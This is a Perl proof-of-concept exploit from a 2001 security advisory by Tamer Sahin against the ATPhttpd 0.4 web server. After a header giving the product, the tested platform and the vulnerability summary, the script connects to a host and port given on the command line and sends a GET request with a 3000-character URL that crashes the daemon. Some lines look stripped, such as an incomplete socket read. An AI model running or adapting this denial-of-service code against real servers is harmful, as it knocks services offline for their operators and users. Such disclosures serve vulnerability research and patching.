#!/usr/bin/perl -w # # ATPhttpd 0.4 DoS Vulnerability # # Type: # DoS, crashes Daemon # # Release Date: # December 13, 2001 # # Product / Vendor: # ATPhttpd, the tiny, caching, high performance webserver. ATPhttpd is ideal for serving lots of static content, # especially where disk I/O is expensive, such as NFS mounted web shares, or graphics servers. # http://www.redshift.com/~yramin/atp/atphttpd/ # # Summary: # Server crashes after sending very long URL a few times. # http://host/AAAAAAAAA...(Ax3000)...AAA # # Log: # You may reach the core file through # http://www.securityoffice.net/downloads/atphttpd.core # # Exploit: # atphttpd.pl by Tamer Sahin # http://www.securityoffice.net/downloads/atphttpd.pl # # Tested: # OpenBSD 2.9 / ATPhttpd 0.4 Alpha release # # Vulnerable: # ATPhttpd 0.4 Alpha release (And may be other) # # Disclaimer: # http://securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. # # Author: # Tamer Sahin # ts@securityoffice.net # http://www.securityoffice.net die "ATPhttpd 0.4 DoS Vulnerability / Usage: $0 host port\n" if $#ARGV <1; print "DONE!\n\n"; print &GetHTTP($ARGV[0],$ARGV[1]); exit 0; sub GetHTTP { use Socket; my($remote,$doc) = @_; my ($port, $iaddr, $paddr, $proto, $line,@output); $port = $ARGV[1]; $sockaddr = 'S n a4 x8'; $doc = "A" x 3000; if ($port =~ /\D/) { $port = getservbyname($port, 'tcp') } die "No port" unless $port; $thisaddr = gethostbyname("localhost"); $thataddr = gethostbyname($remote); $this = pack($sockaddr, AF_INET, 0, $thisaddr); $that = pack($sockaddr, AF_INET, $port, $thataddr); $proto = getprotobyname('tcp'); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "socket: $!"; bind(SOCK, $this) || die "bind: $!"; connect(SOCK, $that) || die "connect: $!"; select(SOCK); $| = 1; select(STDOUT); print SOCK "GET $doc HTTP/1.0\n\n"; do { $line = } until ($line =~ /^\r\n/); @output = ; close (SOCK) || die "close: $!"; @output; }